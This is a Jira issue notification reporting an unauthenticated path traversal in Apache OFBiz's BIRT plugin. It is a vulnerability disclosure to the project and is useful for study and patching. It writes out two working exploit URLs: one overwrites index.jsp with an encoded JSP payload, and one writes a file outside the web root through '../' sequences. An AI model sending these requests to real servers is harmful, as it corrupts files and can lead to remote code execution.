Nikita Podotykin created OFBIZ-12577:
----------------------------------------

             Summary: Unauth Path Traversal with file corruption
                 Key: OFBIZ-12577
                 URL: https://issues.apache.org/jira/browse/OFBIZ-12577
             Project: OFBiz
          Issue Type: Bug
    Affects Versions: 18.12.05
            Reporter: Nikita Podotykin
             Fix For: 18.12.05
         Attachments: image-2022-02-21-15-54-00-257.png, 
image-2022-02-21-15-54-51-612.png, image-2022-02-21-16-00-25-840.png

*Description of the vulnerability*
*Unauth Path Traversal with file corruption*
After reading a note (https://bugs.eclipse.org/bugs/show_bug.cgi?id=538142) 
about a remote code execution (RCE) vulnerability in Birt, there was an attempt 
to reproduce it. 


https://192.168.0.13:8443/birt/output?__report=./../ordermgr/reports/
SalesReport.rptdesign&__format=pdf&__overwrite=true&__document=index.jsp&reportBy=%3C%25%0A%20%20out.println(%22OS%3A%20%22%20%2B%20System.getProperty(%22os.name
%22))%3B%0A%20%20out.println(%22Current%20dir%3A%20%22%20%2B%20getServletContext().getRealPath(%22%2F%22))%3B%0A%25%3E%0A


I rewrite the system index.jsp file 
(~/apache-ofbiz-18.12.05/plugins/birt/webapp/index.jsp), 
corrupting it, but the payload didn't work. Before and after making a request 
from an unauthorized user.

!image-2022-02-21-15-54-00-257.png!

When accessing the script, the index server returns a 500 error.

!image-2022-02-21-15-54-51-612.png!

An unauthorized user can overwrite and corrupt files in the current folder. Can 
it go beyond 
the current folder and overwrite, for example, file /var/tmp/s3cReTfIle? - yes!

https://192.168.0.13:8443/birt/output?__report=./../ordermgr/reports/
SalesReport.rptdesign&__format=pdf&__overwrite=true&__document=../../../../../../../../var/tmp/s3cReTfIle&reportBy=test

!image-2022-02-21-16-00-25-840.png!



--
This message was sent by Atlassian Jira
(v8.20.1#820001)

Reply via email to